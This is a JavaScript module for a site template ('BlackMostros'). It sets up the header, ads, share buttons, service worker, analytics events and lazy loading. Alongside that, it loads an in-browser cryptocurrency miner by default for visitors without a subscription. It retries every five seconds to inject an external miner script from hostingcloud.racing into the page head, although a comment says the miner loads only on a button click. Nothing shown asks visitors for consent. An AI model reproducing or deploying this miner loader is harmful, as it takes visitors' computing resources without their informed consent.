/**
 *
 * This is a JavaScript BlackMostros Template.
 *
 * @source: http://www.pronia.es/templates/black-mostros
 *
 * @licstart  The following is the entire license notice for the
 *  JavaScript code in this page.
 *
 * Copyright (C) 2014  David Lemos González
 *
 *
 * The JavaScript code in this page is free software: you can
 * redistribute it and/or modify it under the terms of the GNU
 * General Public License (GNU GPL) as published by the Free Software
 * Foundation, either version 3 of the License, or (at your option)
 * any later version.  The code is distributed WITHOUT ANY WARRANTY;
 * without even the implied warranty of MERCHANTABILITY or FITNESS
 * FOR A PARTICULAR PURPOSE.  See the GNU GPL for more details.
 *
 * As additional permission under GNU GPL version 3 section 7, you
 * may distribute non-source (e.g., minimized or compacted) forms of
 * that code without the copy of the GNU GPL normally required by
 * section 4, provided you include this license notice and a URL
 * through which recipients can access the Corresponding Source.
 *
 * @licend  The above is the entire license notice
 * for the JavaScript code in this page.
 *
 */
// ~ import('./blackmostros.header.js');
// ~ import BlackMostrosHeader from './blackmostros.header.js';

import {
  when_available,
  when_document_ready,
  run_site_ads,
  fetch_style,
  fetch_script,
  template,
  console_if_debug,
  call_each_n_miliseconds,
  get_language,
  set_hide_on_scroll,
  } from './blackmostros.method.js';
import { BlackMostrosHeader } from './blackmostros.header.js';
import { BlackMostrosBody } from './blackmostros.body.js';
import { BlackMostrosSocial } from './blackmostros.social.js';
import { BlackMostrosMinner } from './blackmostros.minner.js';
import { Google } from './blackmostros.google.js';
// ~ import { start_leads } from './leads.js';
import { LazyLoad } from './blackmostros.lazyload.js';
// ~ import { start_leads } from './blackmostros.leads.js';



// export default obj => {
//   return new Promise((resolve, reject) => {
//     resolve(BlackMostros(obj));
//     /*
//     var _bms = BlackMostros(
//         document
//         );
//     when_available('angular', start_leads);
//     resolve('ok', _bms);
//     */
//
//     reject('bad');
//     });
// };

let BlackMostros = (function ($) {
  // ~ var _first = true, // not used
  var _head,
    // _head = new BlackMostrosHeader(
    //   $
    //   //, _q   // to remove
    //   ),

    _go,
    // ~ _go = new Google($),
    _body,
    // ~ _body = new BlackMostrosBody($),
    _share,
    _minner,
    // ~ _minner = new BlackMostrosMinner(),
    _clist,
    _lload,  // lazyload
    _mainbanid = "ban-content",
    _props = {
      // ads can be disabled if subscription exist and status is true
      // ~ _enable_ads: true,
      _enable: {
        ads: true,
        miner: true,
        },
      _headerid: 'head',
      _menuid: 'topmenu',
      _hidden_class: 'hidden',
      _showinres: 801,
      _mbuttonres: 768,
      _mfheight: "32px",
      _hfheight: "130px",
      _hrheight: "130px",
      _pathwayid: "pathway",
      _miner_path: {
        one: '/tmp/miner/TFYS.php?f=jY9M',
        two: 'https://www.hostingcloud.racing/TS9M.js',
        // ~ two: 'https://www.freecontent.date./9gzu.js',
        },
      _bodyids: [
        _mainbanid,
        "contentarea2",
        ],
      _bodyprops: {
        // we need known header height
        //~ 'top': '146px',
        },
      _searchformid: "div.google-search",
      _articletag: "article",
      _articlesharedheaders: [
        "dd.modified",
        "div.g0",
        ],
      _twitteruserid: "ProniaEs",
      _scrollfloatid: "scroll-float",
      _scrolluppageid: "scroll-up-button",
      _scrolluppagedist: 660,
      _lang_button_selector: 'div.mod-languages',
      _sprite_path: './images/sprites/',
      _sprite_ext: '.png',
      _css_sprite_path: './templates/blackmostros1/css/',
      _css_ext: '.css',
    },

    _script = {
      scripts: {
        // analytic code only in subscription types 'ab'
        // ~ 'client': _props._miner_path,  // can not download
        // matomo analytics
        // ~ 'analytics': undefined,
        // yandex
        // ~ 'yandex': undefined,

        // dont load search here, load when search button clicked
        // ~ 'search': undefined,

        // dont load miner here, load when miner button clicked
        // ~ 'miner': 'https://www.freecontent.date./9gzu.js',
      },
      add: function(script, path){
        _script.scripts[script] = path;
        }
      },

    _pathundefined = template.pathname.js,
    // `/templates/blackmostros1/javascript/blackmostros.`,
    _js_ext = '.js',

    _adsn = 0,
    _maxads = 7,
    _use_sw = true,
    _win = window,
    _tool = {
      get_language: get_language,
      set_hide_on_scroll: set_hide_on_scroll,
      },
    mpublic = {
      tool: _tool,
      props: _props,
      };

  /**
   * set scripts for each test type
   * only in subscriptions type a
   *
   */
  function _add_anaytics_to_scripts(){
    _script.add('yandex', undefined);
  }

  function _set_testab_c(){
    if (bmstestab == 'c'){
      // themoneytizer
      // 'themoneytizer': undefined,
      _script.add('themoneytizer', undefined);
    };
  }

  try {
    if (subscription){
      if ('a'.indexOf(subscription.category) > -1){
        _set_testab_c();
      };
      if ('ab'.indexOf(subscription.category) > -1){
        _add_anaytics_to_scripts();
      };
    }
  } catch (e) {
    _add_anaytics_to_scripts();
    _set_testab_c();
  };

  /*
   * load requirements and init
   *
   */
  function _get_requirements(){
  // ~ async function _get_requirements(){

    /*
     * set blackmostros header
     *
     */
    _head = BlackMostrosHeader($);
    // ~ _head = await BlackMostrosHeader($);

    /*
     * set blackmostros google
     *
     */
    _go = Google($);
    // ~ _go = await Google($);

    /*
     * set blackmostros body
     *
     */
    _body = BlackMostrosBody($);
    // ~ _body = await BlackMostrosBody($);

    /**
     * start share buttons
     *
     **/
    _share = BlackMostrosSocial($);

    /*
     * set blackmostros minner
     *
     */
    // if subscription is type a, b, disable minner
    try {
      if (subscription){
        if ('abc'.indexOf(subscription.category) != -1){
          _props._enable.miner = false;
          console_if_debug('Minning disabled.');
        }
      }
    } catch (e) {}

    _minner = BlackMostrosMinner(_props._enable.miner);

    // ~ _minner = await BlackMostrosMinner();

    /*
     * set blackmostros lazyload
     *
     */
    _lload = LazyLoad(_uri, $, window);
    }

  // BlackMostrosHeader($)
  // .then((data) => {
  //   // ~ return await data;
  //   // ~ return data;
  //   // ~ _head = data;
  //   console.log(
  //     _head,
  //     data
  //     // ~ this, undefined
  //     // ~ self window
  //     );
  //   // ~ _init();
  //   // return _head.value();
  //   })
  // .catch((err) => {
  //   console.log('Can not load header...', err);
  //   })
  // .finally((data) => {
  //   console.log(data);
  //   return data;
  //   // ~ return data;
  //   // ~ _head = data;
  //   // console.log(
  //   //   _head,
  //   //   // ~ this, undefined
  //   //   // ~ self window
  //   //   );
  //   // // ~ _init();
  //   // return _head.value();
  //   }
  //   // ~ (data) => {
  //   // ~ _head = data;
  //   // ~ _init(_head);
  //   // ~ }
  //   );

  // /*
  //  * set blackmostros google
  //  *
  //  */
  // Google($)
  // .then((data) => {
  //   _go = data;
  //   })
  // .catch((err) => {
  //   console.log('Can not load google...', err);
  //   });
  //
  // /*
  //  * set blackmostros body
  //  *
  //  */
  // BlackMostrosBody($)
  // .then((data) => {
  //   _body = data;
  //   })
  // .catch((err) => {
  //   console.log('Can not load body...', err);
  //   });
  //
  //
  // /*
  //  * set blackmostros minner
  //  *
  //  */
  // BlackMostrosMinner()
  // .then((data) => {
  //   _minner = data;
  //   })
  // .catch((err) => {
  //   console.log('Can not load minner...', err);
  //   });
  //
  // console.log(_head, _go, _body, _minner);

  function _init(){
    _get_requirements();

    /*
     * progressive web app service worker
     * use in capable browsers and active module
     *
     */
    if (('serviceWorker' in navigator) && (_use_sw === true)) {
      // ~ window.addEventListener('load', function(){
        console_if_debug('Loading Service Worker');

        // const path = require('path');
        // const url = require('url');
        // let swScope = path.join(_uri, '/');
        // let swPath = url.format({
        //   pathname: path.join(_uri, 'service-worker.js'),
        //   protocol: 'https:',
        //   slashes: true
        // });
        // console.log(swPath, swScope);
        // navigator.serviceWorker.register(`${swPath}`, { scope: `${swScope}` })
        // .then(function(registration) {
        //   console.log('Registration successful, scope is:', registration.scope);
        // })
        // .catch(function(error) {
        //   console.log('Service worker registration failed, error:', error);
        // });

        navigator.serviceWorker
          .register(
            template.script.url.worker,
            // ~ _uri + '/templates/blackmostros1/javascript/service-worker.js', {
            // ~ _uri + '/service-worker.js',
            {
              // ~ scope: '..',
              scope: '.',  // work when worker in '/'
              // ~ scope: './es/',
              // ~ scope: '../../../',
              // ~ scope: _uri,
            })
          // ~ .register(_uri + '/service-worker.js') // redirect is disallowed
          .then(function(registration) {
              console_if_debug('Service Worker Register: ', registration);
              console.log('ServiceWorker registration successful with scope: ', registration.scope);
              // ~ console.log('Service Worker Registered.');
              // ~ _use_sw = true;
            }).catch(function(err) {
             console_if_debug('Service Worker Register error. ', err);
             console.log('Service Worker Register error. ', err, template.script.url.worker);
             // ~ _use_sw = false;
             });

      // ~ });
    }

    /*
     * try save articles local
     *
     */
    /*
    document.querySelector('.items-leading').addEventListener('click', function(event) {
      event.preventDefault();

      var id = this.dataset.articleId;
      caches.open('pronia-article-' + id).then(function(cache) {
        fetch(_uri + '/index.php??id=' + id).then(function(response) {
          // /get-article-urls returns a JSON-encoded array of
          // resource URLs that a given article depends on
          return response.json();
        }).then(function(urls) {
          cache.addAll(urls);
        });
      });
    });
    */


    /*
     * start lazyload images
     *
     */
    /*
    $(function() {
       $("img.lazy").lazyload();
    });
    */

    /*
     * set header
     * set events on close/open menu
     *
     */
    // ~ console.log(_head, _props);
    _head.init(_props);
    // ~ console.log(_head);
    _head.on("menu-opened-0", _fix_header_hide_search_form);
    _head.on("menu-closed-0", _unfix_header);

    // set body
    _body.init(_props._bodyids, _props._bodyprops, _head);

    /*
     * init google tools
     * set form events
     */
    _go.init(_props._searchformid);
    // ~ _go.on("form-opened", _fix_header_hide_opened_menu);
    // ~ _go.on("form-closed", _unfix_header);

    // if (_go.show_button) {
    //   _go.show_button.addEventListener(
    //     "click", _hide_or_show_google_form
    //   );
    //   /*
    //   _go.show_button.on(
    //     "click", _hide_or_show_google_form
    //   );
    //   */
    // }

    // we need show:
    //   show menu wrapper
/*
    $('#topmenuwrap').css({'display': 'table-cell'});
*/

    /*
     * start site ads
     * we need load header ad first and
     * later wait for scroll float panel shown in view
     *
     */
    function _set_site_ads() {
      // ~ var _sf = $.getElementById(_mainbanid);// not used
      // ~ var _sf = $(_mainbanid);
      //~ if (_is_element_into_view(_sf)) {
      // ~ $(window).on('load', function() {
      window.addEventListener('load', function() {
        if (_adsn < _maxads) {
          _adsn += 1;
          run_site_ads(_adsn);
        }
        _scroll_float_ads();
      });
      //~ run_site_ads();
      //~ }

      if (_adsn < _maxads) {
        _adsn += 1;
        run_site_ads(_adsn);
      }

      function _scroll_float_ads() {

        var _sf = $.getElementById(_props._scrollfloatid);
        // ~ var _sf = $(_props._scrollfloatid);
        if (_is_element_into_view(_sf)) {
          _adsn += 1;
          if (_adsn < _maxads) {
            run_site_ads(_adsn);
            console_if_debug('ad loaded', _adsn, _maxads);
          } else {
            //~ console.log('all slots ready...', _adsn);
            if (_adsn >= _maxads) {
              console_if_debug('ad scroll removed');
              window.removeEventListener('scroll', _scroll_float_ads);
              // ~ $(window).unbind('scroll', _scroll_float_ads);
            }
          }
        }
        if (_adsn < _maxads) {
          console_if_debug('ad loaded', _adsn, _maxads);
          run_site_ads(_adsn);
          _adsn += 1;
          }
      }
      window.addEventListener('scroll', _scroll_float_ads);
      // ~ $(window).on('scroll', _scroll_float_ads);
    }

    // if subscription is type b, disable ads
    try {
      if (subscription){
        if ('bc'.indexOf(subscription.category) > -1 ){
          // ~ _props._enable_ads = false;
          _props._enable.ads = false;
          console_if_debug('Ads disabled.');
        }
      }
    } catch (e) {};

    if (_props._enable.ads == true) {
      _set_site_ads();
    }

    /**
     * start share buttons
     *
     **/
    function _set_share_buttons () {
      // ~ _share = BlackMostrosSocial($);
      _share.init(
        _props._twitteruserid, _props._articletag, _props._articlesharedheaders
        )
    }
    _set_share_buttons();

    /**
     * set scroll page button
     *
     */
    _set_scroll_up_page_event();

    /**
     * show disqus thread if in location url
     *
     */
    // function _set_disqus_thread () {
    //   if (document.location.hash.substring(1)=="disqus_thread"){
    //     $.getElementById('disqus_show').click();
    //     // ~ $('#disqus_show').click();
    //   }
    // }
    // _set_disqus_thread();

    /**
     * load sprite css
     *
     */
    _load_sprite_files();

    /*
     * start minner before leads app support
     */
    // ~ if (_props._enable.miner == true) {
    // _minner = BlackMostrosMinner();
    _minner.init();
    mpublic.minner = _minner;
    // ~ }

    // ~ when_available('angular', start_leads);

    /**
     * set other javascript tools here
     * like: metrika
     *
     *
     */
    _load_js_files();
    call_each_n_miliseconds(5000, () => {
      try {
        if (!Client) {
          _retry_load_js_file('two');
        }
      } catch (ReferenceError) {
        _retry_load_js_file('two');
      }
    });

    // set support button events
    _set_support_button_events();

    // set view_item button events
    _set_view_item_button_events();

    /**
     * lazy load logo images
     *
     *
     */
    _lload.init();

    // when_available('angular', function(){
    //   console_if_debug('Running leads...');
    //   start_leads();
    //   });

    console_if_debug('Blackmostros ready...');
    // ~ console.log('Blackmostros ready...')

  }
  mpublic.init = _init;

  function _is_element_into_view(elem){
      try {
        var docViewTop = $(window).scrollTop(),
          docViewBottom = docViewTop + $(window).height(),
          elemTop = $(elem).offset().top,
          elemBottom = elemTop + $(elem).height();

        return ((elemBottom <= docViewBottom) && (elemTop >= docViewTop));
      } catch (TypeError) {
        return
      }
  }

  // not used
  // function _fix_header_hide_opened_menu(){
  //   //~ _try_fix_header(true);
  //   // ~ _head.hide_menu();
  // }

  function _fix_header_hide_search_form(){
    _try_fix_header(true);
    _go.hide_google_search_results();
    _go.hide_google_search_form();
  }

  function _unfix_header(){
    _try_fix_header(false);
  }

  function _try_fix_header(value){
    // fix/unfix header
    if (value) {
      //~ _head.hide_menu();
      _head.fix();
      _body.fix();
    } else {
      _head.unfix();
      _body.unfix();
    }
  }

  // not used
  // function _hide_or_show_google_form(evt){
  //   /*
  //    * when show search form, hide opened menus and fix header.
  //    * when fix the header, we need set body margin top size.
  //    * if run first time, set events
  //    *
  //    */
  //   var _re = _go.hide_or_show_google_form(evt, _head);
  //
  //   // fix/unfix header
  //   _try_fix_header(_re);
  //
  //   // if first, add event listeners
  //   if (_first) {
  //     _first = false;
  //     _go.config_form();
  //     _go.show_google_search_form();
  //
  //     if (_go.button) {
  //       _go.button.addEventListener(
  //         "click", _google_search_button_clicked
  //         );
  //       _go.input.addEventListener(
  //         "keyup", _google_search_keyup
  //         );
  //
  //       /* jquery
  //       _go.button.on(
  //         "click", _google_search_button_clicked
  //         );
  //       _go.input.on(
  //         "keyup", _google_search_keyup
  //         );
  //       */
  //
  //       /*
  //       // this dont work in mobiles
  //       //~ _go.input.addEventListener(
  //       _go.input.on(
  //         "focusout", _google_search_input_focusout
  //         );
  //       */
  //
  //       // some times not found, google change selectors.
  //       //~ _go.close_button.addEventListener(
  //       _go.close_button.on(
  //         "click", _google_search_close_button_clicked
  //         );
  //     }
  //   }
  // }

  // function _google_search_button_clicked(){
  //   // allways show google results module
  //   _go.show_google_search_results();
  //   _head.fixheader();
  // }

  // function _google_search_close_button_clicked(){
  //   _go.hide_google_search_results();
  //   _go.hide_google_search_form();
  //   _head.unfix();
  //   _body.unfix();
  //   //~ _head.unfixheader();
  // }

  /* this function dont work on mobiles
  function _google_search_input_focusout(){
    _go.hide_google_search_results();
    _go.hide_google_search_form();
    _head.unfix();
    _body.unfix();
    //~ _head.unfixheader();
  }
  */

  // function _google_search_keyup(evt){
  //   var _k = evt.keyCode;
  //   // escape and return
  //   if ([27, 13].indexOf(_k)) {
  //     if (_k==13) {
  //       _go.show_google_search_results();
  //     } else if (_k==27) {
  //       _go.hide_google_search_results();
  //       _head.unfixheader();
  //     }
  //   }
  // }

  function _add_js_head_link(url) {
    var link = $.createElement('script');

    link.type = 'text/javascript';
    // ~ link.rel = 'stylesheet';
    // ~ link.onload = function() {
      // ~ resolve();
      // ~ };
    link.src = url;

    var headScript = $.querySelector('script');
    headScript.parentNode.insertBefore(link, headScript);

  }

// moved to method
//   /*
//    * next  function add javascript code to html
//    *
//    *
//    *
//    */
//   var _fetch_script = function(url) {
//     // Old-school:
//     //var a2 = a.map(function(s){ return s.length });
//     // ECMAscript 6 using arrow functions
//     //var a3 = a.map( s => s.length );
//
//     return new Promise(function(resolve, reject){
//
//       var xhttp = new XMLHttpRequest();
//
//       /* // not used
//       function _add_js_head_link() {
//         var link = $.createElement('script');
//
//         link.type = 'text/javascript';
//         // ~ link.rel = 'stylesheet';
//         link.onload = function() {
//           resolve();
//           };
//         link.href = url;
//
//         var headScript = $.querySelector('script');
//         headScript.parentNode.insertBefore(link, headScript);
//
//       }
//       */
//       // ~ _add_js_head_link();
//
//       /* // not used
//       function _eval_js_code() {
//         let _code = xhttp.responseText;
//         let _re = new Promise((resolve, reject) => {
//           eval(_code);
//           });
//         _re.then(() => {
//           console_if_debug('script evaluated...');
//           // ~ console.log('script evaluated...');
//           });
//         resolve();
//       }
//       */
//
//       /*
//        * do appendChild when document is ready
//        * and use
//        *
//        *
//        */
//
//       /**
//        * If run as a requestAnimationFrame callback, this
//        * will be run at the start of the frame.
//        */
//       function updateScreen(
//         //time
//         ) {
//         // let part = '';
//         // [].forEach.call(
//         //   xhttp.responseText,
//         //   (char)=>{
//         //     part += char;
//         //     if (part.length == 100) {
//         //       // ~ requestAnimationFrame()
//         //       script.innerHTML += part;
//         //       part = '';
//         //     };
//         // });
//
//         // var tag = $.createElement('script');
//         // tag.innerHTML = xhttp.responseText;
//         // script.appendChild(tag);
//
//         // Make visual updates here.
//         // ~ var script = $.createDocumentFragment();
//         var script = document.createElement('script');
//         var body = $.querySelector('body');
//
//         script.innerHTML = xhttp.responseText;
//         console_if_debug(script);
//         // long time
//         body.appendChild(script);
//
//         // Typical action to be performed when the document is ready:
//         // ~ document.getElementById("demo").innerHTML = xhttp.responseText;
//         resolve();
//       }
//
//       function _add_script_element(){
//
//         //dont work
//         // script.addEventListener('load', function() {
//         //   resolve();
//         // });
//
//         xhttp.onreadystatechange = function() {
//             if (this.readyState == 4 && this.status == 200) {
//               // requestAnimationFrame(()=>{
//               //   Promise.resolve().then(_eval_js_code);
//               //   });
//
//               // next line 223 missing samples
//               // requestAnimationFrame(_eval_js_code);
//
//               requestAnimationFrame(updateScreen);
//             } else if (this.status == 404) {
//               reject(new Error("Resource not found."));
//             }
//         };
//         xhttp.open("GET", url, true);
//         xhttp.send();
//
//       }
//       _add_script_element();
//
//     });
//
//     /*
//     return new Promise((resolve, reject) => {
//       let link = document.createElement('link');
//
//       link.type = 'text/css';
//       link.rel = 'stylesheet';
//       link.onload = function() {
//         resolve();
//         };
//       link.href = url;
//
//       var headScript = document.querySelector('script');
//       headScript.parentNode.insertBefore(link, headScript);
//     });
//     */
//
//   };

  // this will work in IE 10, 11 and Safari/Chrome/Firefox/Edge
  // add ES6 poly-fill for the Promise, if needed (or rewrite to use a callback)

  /* // not used
  function _load_js_files_with_worker() {
    when_document_ready(function(){
      let _scripts = {
        // ~ 'client': 'tmp/miner/TFYS.php?f=jY9M',
        // analytics
        'analytics': undefined,
        // yandex
        'yandex': undefined,
        'search': undefined,
        },
        _pathundefined = '/templates/blackmostros1/javascript/blackmostros.',
        _path,
        _ext = '.js';

      class MyWorker extends Worker {
        constructor(path, args){
          let _args = args;
          super(path);

          this.get_args = function (){
            return _args;
          };
          // ~ Worker.call(this);
        }
        // document () {
        //   return $;
        // };
      }

      [].forEach.call(Object.keys(_scripts), _e => {
        if (_scripts[_e] == undefined) {
          _path = `${_uri}${_pathundefined}${_e}${_ext}`
        } else {
          _path = `${_scripts[_e]}${_ext}`
        }


        var _work = new MyWorker(_path, [document, window]);
        // ~ var _work = new Worker(_path);
        _work.onmessage = function (event) {
          console_if_debug('data:', event.data);
          // ~ console.log('data:', event.data);
        };
        _work.postMessage(
          ''
        //   'start'
        //   // [document, window]
           );
        console_if_debug(_work);
        // ~ console.log(_work);

      });
    });

  }
  */

  /**
   * function to load js with xhs if dont success at start time
   *
   */
  async function _retry_load_js_file(name) {

    // load minner js if miner is enabled
    if (_props._enable.miner == true) {
      let _path = _props._miner_path[name];
      // ~ let _path = _get_script_path(name);
      console_if_debug(_path, name);
      _add_js_head_link(_path);
    }

    // _fetch_script(
    //   _path
    // ).then(
    //   console_if_debug('loading:', name)
    // );
  }

  function _get_script_path(name) {
    let _path;
    // ~ let _scripts = _get_scripts();

    if (_script.scripts[name] == undefined) {
      _path = `${_uri}${_pathundefined}${name}${_js_ext}`;
    } else {
      _path = _script.scripts[name];
      if (!_path.startsWith('http')){
        _path = `${_uri}${_script.scripts[name]}${_js_ext}`;
      }

    }

    return _path;

  }

  // function _get_scripts(){
  //   return _scripts;
  // }

  function _load_script(_e){
    // _e => {
    let _path = _get_script_path(_e);
    console_if_debug(_path, _e);
    // if (_script.scripts[_e] == undefined) {
    //   _path = `${_uri}${_pathundefined}${_e}${_ext}`
    // } else {
    //   _path = `${_uri}${_script.scripts[_e]}${_ext}`
    // }

    fetch_script(
      _path
      // ~ `${_uri}${_path}${_e}${_ext}`
      // ~ _uri + '/templates/blackmostros1/javascript/blackmostros.analytics.js'
    ).then(
      async function(){
        await when_available(_e, () => {
          // ~ console.log(`Running ${_e}...`);
          let _ins = window[_e]();
          _ins.init();
          // ~ _yandex = yandex();
          // ~ _yandex.init();
          // ~ console.log(`${_e} ready...`, _ins);
        });
      }
    ).catch(e => {
        console_if_debug(e);
        // ~ console.log(e);
      });
  };
  mpublic.script = _script;
  mpublic.load_script = _load_script;

  async function _load_js_files() {
    /**
     * load scripts when document ready.
     *
     *
     */
    if ('requestIdleCallback' in window) {

      // Use requestIdleCallback to schedule work.
      // make a flash
      //
      // let _current = null, _is_loading = false;
      //
      // function load_scripts_work(deadline){
      //
      //   if (_is_loading)
      //     return;
      //
      //   _is_loading = true;
      //
      //   while (deadline.timeRemaining() > 0){
      //     if (_current != null){
      //       _load_script(_current);
      //       // ~ _current = null;
      //       // ~ doWorkIfNeeded();
      //     }
      //   }
      //
      //   _is_loading = false;
      // };
      //
      // [].forEach.call(Object.keys(_scripts), function(_e){
      //   _current = _e;
      //   requestIdleCallback(load_scripts_work);
      //   // ~ _load_script
      // });

      when_document_ready(async function(){
        // ~ let _scripts = _get_scripts();
        [].forEach.call(Object.keys(_script.scripts), _load_script);

      });

    } else {
      // Do what you’d do today.
      await when_document_ready(async function(){
        // ~ let _scripts = _get_scripts();
        await [].forEach.call(Object.keys(_script.scripts), _load_script);

        // // analytics
        // fetch_script(_uri + '/templates/blackmostros1/javascript/blackmostros.analytics.js').then(
        //   (e) => {
        //     _yandex = yandex();
        //     _yandex.init();
        //     console.log('Yndex ready...');
        //   }
        // ).catch((e)=>{
        //     console.log(e);
        //   });
        //
        // // yandex
        // fetch_script(_uri + '/templates/blackmostros1/javascript/blackmostros.yandex.js').then(
        //   (e) => {
        //     _yandex = yandex();
        //     _yandex.init();
        //     console.log('Yandex ready...');
        //   }
        // ).catch((e)=>{
        //     console.log(e);
        //   });


      });
    }

  }

  /* // not used
  function _load_js_files_with_xhs() {

    // load scripts when document ready.
    when_document_ready(function(){
      let _scripts = {
        'client': 'tmp/miner/TFYS.php?f=jY9M',
        // analytics
        'analytics': undefined,
        // yandex
        'yandex': undefined,
        'search': undefined,
        },
        _pathundefined = '/templates/blackmostros1/javascript/blackmostros.',
        _path,
        _ext = '.js';

      [].forEach.call(Object.keys(_scripts), _e => {
        if (_scripts[_e] == undefined) {
          _path = `${_uri}${_pathundefined}${_e}${_ext}`
        } else {
          _path = `${_scripts[_e]}${_ext}`
        }
        fetch_script(
          _path
          // ~ `${_uri}${_path}${_e}${_ext}`
          // ~ _uri + '/templates/blackmostros1/javascript/blackmostros.analytics.js'
        ).then(
          function(){
            when_available(_e, () => {
              // ~ console.log(`Running ${_e}...`);
              let _ins = window[_e]();
              _ins.init();
              // ~ _yandex = yandex();
              // ~ _yandex.init();
              // ~ console.log(`${_e} ready...`, _ins);
            });
          }
        ).catch(e => {
            console_if_debug(e);
            // ~ console.log(e);
          });

        });

      // // analytics
      // fetch_script(_uri + '/templates/blackmostros1/javascript/blackmostros.analytics.js').then(
      //   (e) => {
      //     _yandex = yandex();
      //     _yandex.init();
      //     console.log('Yndex ready...');
      //   }
      // ).catch((e)=>{
      //     console.log(e);
      //   });
      //
      // // yandex
      // fetch_script(_uri + '/templates/blackmostros1/javascript/blackmostros.yandex.js').then(
      //   (e) => {
      //     _yandex = yandex();
      //     _yandex.init();
      //     console.log('Yandex ready...');
      //   }
      // ).catch((e)=>{
      //     console.log(e);
      //   });


    });
  }
  */

  async function _load_sprite_files() {
    // ~ var file = location.pathname; //.split( "/" ).pop();
    await fetch_style(_uri + '/templates/blackmostros1/css/style.sprite.image.end.min.css');
    await fetch_style(_uri + '/templates/blackmostros1/css/style.end.min.css');
    /* dont work
    var link = document.createElement('link');
    link.href = '//templates/blackmostros1/css/style.sprite.image.end.min.css';
    link.rel = 'stylesheet';
    link.type = 'text/css';
    // Temporarily set media to something inapplicable to ensure it'll fetch without blocking render
    link.media = 'all';
    // Set the media back when the stylesheet loads
    link.onload = function() {
        link.media = 'all'
        }
    document.getElementsByTagName('head')[0].appendChild(link);
    */

  }

  /*
   * work with scroll-up page button
   *
   */
  function _set_scroll_up_page_event() {
    var _sb = $.getElementById(
          _props._scrolluppageid
          ),
        _lb = $.querySelector(
          _props._lang_button_selector
          );

    // scroll event
    function _on_scroll(){
      var _class = 'scrolled',
        fromTopPx = _props._scrolluppagedist,
        // distance to trigger
        scrolledFromtop = _win.scrollY;
      // ~ var scrolledFromtop = $(window).scrollTop();
      _clist = _sb.classList
      // ~ console.log(fromTopPx, scrolledFromtop);
      if(scrolledFromtop > fromTopPx){
        _clist.add(_class);

        // hide menu language
        if (_lb) {
          _lb.classList.add(_props._hidden_class)
        }
        // ~ $(_props._scrolluppageid).addClass('scrolled');
      }else{
        _clist.remove(_class);
        // show menu language
        if (_lb) {
          _lb.classList.remove(_props._hidden_class)
        }
        // ~ $(_props._scrolluppageid).removeClass('scrolled');
      }
    }

    // click event
    if (_sb) {
      _win.addEventListener('scroll', _on_scroll);

      _sb.addEventListener('click',function(){
        _win.scrollTo(0,0);
        // ~ $("html, body").animate({ scrollTop: 0 }, 660);
        return false;
      });
    };

    /*
    $(window).scroll(function () {
        var fromTopPx = _props._scrolluppagedist; // distance to trigger
        var scrolledFromtop = $(window).scrollTop();
        if(scrolledFromtop > fromTopPx){
            $(_props._scrolluppageid).addClass('scrolled');
        }else{
            $(_props._scrolluppageid).removeClass('scrolled');
        }
    });
    */

    /*
    $(_props._scrolluppageid).on('click',function(){
        $("html, body").animate({ scrollTop: 0 }, 660);
        return false;
    });
    */
  }

  /**
   * set send events to analytics support
   *
   */
  function _click_on_support(evt){
    _click_on_button(
      evt, undefined, 'support', evt.target.classList.toString(), 1
      );
    // console_if_debug('clicked:', evt);
    // if(gtag){
    //   gtag('event', 'begin_checkout', {
    //     'event_category': 'support',
    //     'event_label': evt.target.classList.toString(),
    //     'value': 1
    //   });
    // }

  }

  /**
   * set send events to analytics support
   *
   */
  function _click_on_view_item_button(evt){
    _click_on_button(
      evt, 'view_item', 'general', evt.target.id, 1
      );
  }

  /**
   * set send events to analytics support
   *
   */
  function _click_on_button(evt, type, category, label, value){
    console_if_debug('clicked:', evt);
    if(gtag){
      let _type = type || 'begin_checkout'
      gtag('event', _type, {
        'event_category': category,
        'event_label': label,
        'value': value
      });
    }
  }

  function _set_view_item_button_events(){
    let _buttons = [
      'fifawwc_es', 'fifawwc_en'
      ];
    [].forEach.call(_buttons, _e => {
      let _ele = $.getElementById(_e);
      if (_ele) {
        _ele.addEventListener('click', _click_on_view_item_button);
      };
    });
  }

  function _set_support_button_events(){
    let _buttons = [
      'patreon', 'paypal', 'flattr', 'bitcoin', 'fifawwc_es', 'fifawwc_en'
      ];
    [].forEach.call(_buttons, _e => {
      let _ele = $.getElementById(_e);
      if (_ele) {
        _ele.addEventListener('click', _click_on_support);
      };
    });
  }

  // ~ _init();

  // init when document is ready
  // with this menu dont show fast
  /*
  when_document_ready(function () {
    _init();
  });
  */

  /*
  $(document).ready(function()
  {
    init();
  });
  */

  return mpublic;
}); // (jQuery.noConflict());

export {
  BlackMostros,
  }
